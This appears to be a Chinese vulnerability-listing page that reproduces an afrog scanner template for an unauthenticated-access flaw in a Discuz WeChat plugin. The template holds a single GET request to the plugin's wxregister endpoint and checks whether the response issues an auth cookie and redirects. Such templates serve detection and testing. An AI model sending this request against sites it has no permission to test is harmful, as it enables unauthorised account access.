discuz-wechat-plugins-unauth: Discuz Wechat Plugins Unauth

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Discuz Wechat Plugins Unauth

PoC代码[已公开]

id: discuz-wechat-plugins-unauth

info:
  name: Discuz Wechat Plugins Unauth
  author: JrD
  severity: high
  description: |-
    Discuz Wechat Plugins Unauth
  tags: discuz,wechat,unauth
  created: 2023/08/13

rules:
  r0:
    request:
      method: GET
      path: /plugin.php?id=wechat:wechat&ac=wxregister
    expression: response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/discuz-wechat-plugins-unauth.yaml